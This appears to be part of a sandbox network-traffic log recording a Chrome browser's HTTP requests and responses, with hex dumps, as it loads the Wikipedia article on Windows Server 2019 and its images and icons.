                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC695OUTGET /wikipedia/en/thumb/e/ed/Windows_Server_2019_desktop_screenshot.png/300px-Windows_Server_2019_desktop_screenshot.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC1076INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Windows_Server_2019_desktop_screenshot.png
                                                                                                                                                                                                                                      last-modified: Sun, 08 Dec 2024 05:43:03 GMT
                                                                                                                                                                                                                                      content-length: 53547
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 09:47:08 GMT
                                                                                                                                                                                                                                      server: envoy
                                                                                                                                                                                                                                      etag: 113de3e7fd83af27a827bd1e2690b939
                                                                                                                                                                                                                                      age: 29143
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 miss
                                                                                                                                                                                                                                      x-cache-status: hit-local
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-local", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC13832INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 07 74 49 4d 45 07 e8 0c 08 05 2b 02 a8 32 a8 0f 00 00 80 00 49 44 41 54 78 da ec fd 79 ac 2d 57 96 de 89 fd d6 8e 88 33 dd 79 78 f3 c0 f7 1e c7 64 32 a7 ca 4c 66 55 d6 24 55 96 7a 28 75 69 68 09 86 5d 76 0b 6d c3 b0 db 40 37 8c 86 fd 8f db 53 77 fb 0f c3 30 60 a0 6d b8 2d 35 7a 84 6c 74 ab 05 57 ab 4a 72 aa 54 2a 95 54 53 66 56 e5 44 32 93 64 92 7c 24 df 3c
                                                                                                                                                                                                                                      Data Ascii: PNGIHDR,r|gAMAa cHRMz&u0`:pQ<bKGDCpHYs+tIME+2IDATxy-W3yxd2LfU$Uz(uih]vm@7Sw0`m-5zltWJrT*TSfVD2d|$<
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC15296INData Raw: 73 c7 08 c3 88 95 d5 35 ba 3d 38 76 fc 18 ad c8 10 4f 94 b0 a5 2c 9c 38 c1 58 23 56 16 ba bc f3 f6 3b 1c 8c 26 87 53 68 1e f6 0a 78 f7 b4 f0 cc 2f 69 53 a7 ae c4 80 4c 8d 43 e3 1b 5b 06 b5 2c 2c 67 16 9b 9a 3d d7 0c 79 63 df 0d 39 97 29 31 72 48 7f 58 8e dc 3a f7 58 97 cd 0e ce 75 5c 4c 0f d1 f4 32 35 33 4f b7 73 8b 6f 5a 81 4f 52 ad 66 29 52 51 75 55 cf 9c 23 cd 0c 52 b5 6e b1 a5 d3 be 13 95 94 45 1a 3b 28 d3 c0 d3 21 18 a2 6a 99 ad 48 53 86 25 8d 41 ac c2 c1 ca d3 75 1a 02 9b 54 35 bd 28 04 20 65 1a c3 cc c7 70 8a ee ac 7b 6f 12 54 36 09 fc 0c 8b da f5 95 86 f2 d9 0f 54 12 80 31 88 5a fe ce ff e2 17 f9 8d 5f f9 2c 49 7a 34 f0 3d 8e d3 ac f9 98 4c 48 52 98 8c 86 ec ee f7 39 7b fe 0c 36 49 19 8f 46 98 30 a4 d5 6a 61 34 e6 fe d6 80 63 eb 2b 24 49 8c 60 19
                                                                                                                                                                                                                                      Data Ascii: s5=8vO,8X#V;&Shx/iSLC[,,g=yc9)1rHX:Xu\L253OsoZORf)RQuU#RnE;(!jHS%AuT5( ep{oT6T1Z_,Iz4=LHR9{6IF0ja4c+$I`
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC15296INData Raw: 0d 41 51 fc 61 95 a6 24 80 6a 19 24 b5 40 56 9f 7f 31 30 1f 2a 4b 91 64 0a 7a 41 90 11 69 29 79 50 61 d1 c0 70 89 a6 2a 16 5b 0c 30 37 ed 7d 52 33 44 b1 2a a5 a6 96 af 5c ed bd c7 b2 17 9c ad b3 d4 96 71 07 b2 92 34 8f 50 d6 94 f9 ac 2d 1a 93 79 90 2a f1 c7 9c dd 9e 4b f2 c8 e3 d2 1a ac b5 9c ed 1d f0 1f fd e2 3b 2c 77 b3 e9 fb ff d3 b7 ce f2 fa c6 5a 71 73 e4 1c ac dc 09 36 37 a5 08 82 00 6b ed 14 c6 95 53 1c e2 38 26 08 02 92 24 c1 5a 4b ab d5 2a f4 b6 8c 31 05 f7 ca bf 21 a2 28 2a b0 2f 63 0c 0b 0b 0b a4 69 4a bf df 47 55 0b 97 d9 1c e8 3f 74 07 3f 24 b0 a9 2a f7 fa 09 e3 38 eb 86 58 9b 0d a0 1a 47 f0 4b 6d e6 51 98 d8 6c ce 2a cd cd 22 82 ac 63 32 49 ec 03 0d 4f 57 e7 42 92 54 d9 1b a6 98 20 eb a8 4c d2 cc 26 6c 9c 28 51 00 fd b1 9d dd ea 93 43 82 9a
                                                                                                                                                                                                                                      Data Ascii: AQa$j$@V10*KdzAi)yPap*[07}R3D*\q4P-y*K;,wZqs67kS8&$ZK*1!(*/ciJGU?t?$*8XGKmQl*"c2IOWBT L&l(QC
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC9123INData Raw: d1 9c a2 28 f0 d2 4b 2f 01 70 9a eb af bd f6 1a a6 d3 69 1f b4 fa e3 81 64 5b da 7b cf 3a bc 25 06 9e 3a 65 45 a1 53 c7 48 c1 84 a0 2d ae 15 a0 45 09 fb 0a 22 7b a1 61 46 14 55 42 9b bf af 69 02 31 ab f1 63 35 49 6a 25 fd 9d 94 a7 a9 73 86 49 2a aa c2 c3 10 26 05 17 29 de 17 fe 3d 98 93 fa 0e 24 07 ea 84 ad 54 b7 13 72 18 5b b9 22 27 ba 00 71 e8 cc 89 ac 89 84 83 4f d4 9a 4a 41 8b 33 dc 8a 6c ad cc 65 e3 58 8f ca d0 44 a0 6b c8 f8 88 87 42 c3 5a 2c ac 27 95 b6 ae cf 21 1b 01 12 b3 14 54 07 63 dc 68 b8 77 cf 51 19 56 50 fe 7c ff fd f7 f1 b3 3f fb b3 78 ea a9 a7 f0 d6 5b 6f f5 01 ab 3f ee 3b 58 29 47 e4 78 63 27 37 14 42 91 04 f2 58 67 60 94 7a 4c 2d c1 2a 44 b3 02 7a a6 c4 7a d6 42 e0 50 09 fa 03 64 f9 99 db aa a7 21 66 62 68 ce 92 e5 38 60 9c 54 3d 93 29
                                                                                                                                                                                                                                      Data Ascii: (K/pid[{:%:eESH-E"{aFUBi1c5Ij%sI*&)=$Tr["'qOJA3leXDkBZ,'!TchwQVP|?x[o?;X)Gxc'7BXg`zL-*DzzBPd!fbh8`T=)


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      40192.168.2.1649768185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC658OUTGET /wikipedia/commons/thumb/0/05/Windows_10_Logo.svg/200px-Windows_10_Logo.svg.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC1062INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 16:22:40 GMT
                                                                                                                                                                                                                                      etag: 2a0b8a3b1f901babbfe45663b2da7151
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      content-type: image/webp
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Windows_10_Logo.svg.webp
                                                                                                                                                                                                                                      last-modified: Fri, 03 Feb 2023 02:26:54 GMT
                                                                                                                                                                                                                                      content-length: 1884
                                                                                                                                                                                                                                      age: 5411
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 hit/8
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC1884INData Raw: 52 49 46 46 54 07 00 00 57 45 42 50 56 50 38 4c 47 07 00 00 2f c7 00 09 10 cf e7 20 92 24 45 ca 05 09 e7 e2 f4 bc 7f 1d dc f1 b1 64 21 1c 47 92 e4 28 39 b3 7b 77 f0 c7 7f db 70 41 6b 68 37 92 24 39 0a d3 b7 d7 c8 d3 16 2e 0f e1 cb 7c 0a 57 9f 00 9a 8d 19 b5 6d db 30 f0 94 2e e7 0c 56 62 0f b8 85 23 7d e9 ed c8 7b e7 27 17 bd 0f c7 90 81 82 51 41 f1 10 15 8c 12 86 41 d6 b0 08 54 04 52 40 0a 13 c3 88 22 90 a4 22 00 25 20 01 d2 98 a3 c4 30 8c 02 40 40 31 1d 18 14 00 c3 30 d2 e0 58 19 c6 81 05 02 fc 01 4e 8a 27 0f 5e 38 0f 41 41 ee 88 11 21 7e 08 15 06 55 56 a0 8a 08 89 4b e2 c6 88 0a 43 45 0c bb 54 e2 30 02 20 7e 88 11 31 2a 8c 0f 14 e4 96 92 bf 87 18 42 54 54 50 9c 0a b2 07 a4 9a 80 ea 44 07 24 33 28 d0 00 3a ba 54 f6 17 42 fa 37 5b 08 89 e3 0c 40 65 2e 72
                                                                                                                                                                                                                                      Data Ascii: RIFFTWEBPVP8LG/ $Ed!G(9{wpAkh7$9.|Wm0.Vb#}{'QAATR@""% 0@@10XN'^8AA!~UVKCET0 ~1*BTTPD$3(:TB7[@e.r


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      41192.168.2.1649767185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC656OUTGET /wikipedia/en/thumb/d/db/Symbol_list_class.svg/16px-Symbol_list_class.svg.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC1066INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 15:18:21 GMT
                                                                                                                                                                                                                                      etag: df8a72053f190ec74b5a37b4685067cb
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      content-type: image/webp
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Symbol_list_class.svg.webp
                                                                                                                                                                                                                                      last-modified: Fri, 14 Jun 2024 17:44:29 GMT
                                                                                                                                                                                                                                      content-length: 580
                                                                                                                                                                                                                                      age: 9270
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 hit/3083
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC580INData Raw: 52 49 46 46 3c 02 00 00 57 45 42 50 56 50 38 4c 2f 02 00 00 2f 0f 00 04 10 df e4 20 92 24 45 ca ee d9 7b 06 01 ef 5f 26 bf 09 07 6d 24 39 52 55 6f bc 3b 08 8f fa f1 5e 18 07 91 24 29 52 1e 33 e3 ab 79 ff 92 78 e0 d6 b6 ed 26 3a ef fd 2f 09 ef 22 4f 44 6a 33 4a 60 51 09 35 12 51 01 21 44 9e cc 7b 3b 23 fd 36 00 20 20 20 20 60 40 c0 07 0b 16 14 04 04 14 14 b1 c5 9a 31 3f 65 7d 48 58 db 9f df b3 ae 8e 91 ab 19 98 f3 c4 a8 fa ce 47 c0 cc 93 62 85 b4 cb dc 33 9a 84 94 49 e6 41 d6 50 64 16 54 fa fc 52 a3 d7 16 c6 f8 cf dc af 9d bd 5b 72 70 10 56 69 fa 5c e4 df 00 0f 3c 48 28 e9 98 24 a3 1e 14 94 40 e1 8d 88 1c 28 28 e2 3f 15 d1 8b d4 03 19 b9 86 7b 63 fa 7a 7f 61 8c da fb fd de df a6 db 77 25 73 4f 39 74 88 0b 15 8f e3 f7 7f 6f c1 6a c2 98 68 10 ae 16 ba 5a 22
                                                                                                                                                                                                                                      Data Ascii: RIFF<WEBPVP8L// $E{_&m$9RUo;^$)R3yx&:/"ODj3J`Q5Q!D{;#6 `@1?e}HXGb3IAPdTR[rpVi\<H($@((?{czaw%sO9tojhZ"


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      42192.168.2.1649764185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC664OUTGET /wikipedia/en/thumb/9/96/Symbol_category_class.svg/16px-Symbol_category_class.svg.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC1068INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:48:11 GMT
                                                                                                                                                                                                                                      etag: 76a5edf0bd61368aed4d36e986e02464
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      content-type: image/webp
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Symbol_category_class.svg.webp
                                                                                                                                                                                                                                      last-modified: Thu, 13 Jun 2024 00:12:26 GMT
                                                                                                                                                                                                                                      content-length: 526
                                                                                                                                                                                                                                      age: 280
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 hit/507
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC526INData Raw: 52 49 46 46 06 02 00 00 57 45 42 50 56 50 38 4c f9 01 00 00 2f 0f 00 04 10 5f e4 26 92 24 47 aa 1a 71 fa de 7e 26 cf 9f d3 7b 6a 68 38 6c db c8 91 24 cf de dd e7 6f 28 f7 df c0 97 92 7f 1c b5 91 24 49 8e ea ee 39 18 0c 7f 8c fb 5f b8 b5 6d ab aa e6 15 dc dd ca 60 90 13 6a 44 83 14 44 01 1a 53 82 7e 0d 00 04 10 40 00 55 10 40 00 19 44 90 41 02 09 24 10 40 ea 49 7d d9 f9 79 dd b5 d7 a3 d3 e3 60 9f 25 f6 4a 39 87 78 1e 94 2c bd 9e d4 89 68 0b 46 12 df 59 8e 0e bb 50 ee 95 7b 94 9a fa 56 4b 91 51 00 af 88 ae 51 55 ff 20 82 08 32 44 81 48 10 89 2e 1a 18 e1 b0 7f e5 37 9a d5 66 f3 57 14 6d fe 1e fc 64 87 11 e8 d0 86 a3 2a e8 a3 16 ad 02 7a b4 bf 41 1f 2c a6 1d c0 ed f3 b4 fa 3d cc 9f a7 ef 17 87 00 7f 55 0f 8c 44 83 43 02 51 2a 37 b3 85 23 5c 74 2c e3 65 b6 aa
                                                                                                                                                                                                                                      Data Ascii: RIFFWEBPVP8L/_&$Gq~&{jh8l$o($I9_m`jDDS~@U@DA$@I}y`%J9x,hFYP{VKQQU 2DH.7fWmd*zA,=UDCQ*7#\t,e


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      43192.168.2.1649766185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC804OUTGET /static/images/mobile/copyright/wikipedia-tagline-en.svg HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC925INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 16:34:33 GMT
                                                                                                                                                                                                                                      expires: Tue, 06 Jan 2026 18:29:23 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"24e4-62309f0dda7c0"
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      age: 4698
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/42087
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 9444
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC9444INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 31 37 20 31 33 22 3e 3c 70 61 74 68 20 64 3d 22 4d 38 39 2e 37 37 37 20 33 2e 33 32 36 63 2e 31 30 34 20 30 20 2e 31 37 2e 30 33 39 2e 31 37 2e 30 39 32 20 30 20 30 2d 2e 30 35 35 2e 33 36 33 2d 2e 30 35 35 2e 38 33 32 20 30 20 2e 30 39 33 2e 30 37 36 2e 30 38 31 2e 31 31 37 2e 30 33 39 2e 35 38 34 2d 2e 35 39 34 20 31 2e 33 2d 2e 39 32 31 20 31 2e 37 38 31 2d 2e 39 32 31 20 31 2e 33 33 20 30 20 32 2e 33 20 31 2e 32 37 20 32 2e 33 30 31 20 32 2e 36 35 31 20 30 20 31 2e 30 35 2d 2e 33 35 32 20 31 2e 38 36 2d 2e 39 36 33 20 32 2e 34 35 37 2d 2e 35 33 33 2e 35 30 39 2d 31 2e 31 38 2e 37 32 39 2d 31
                                                                                                                                                                                                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 117 13"><path d="M89.777 3.326c.104 0 .17.039.17.092 0 0-.055.363-.055.832 0 .093.076.081.117.039.584-.594 1.3-.921 1.781-.921 1.33 0 2.3 1.27 2.301 2.651 0 1.05-.352 1.86-.963 2.457-.533.509-1.18.729-1


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      44192.168.2.1649769185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1176OUTGET /w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Origin: https://en.wikipedia.org
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
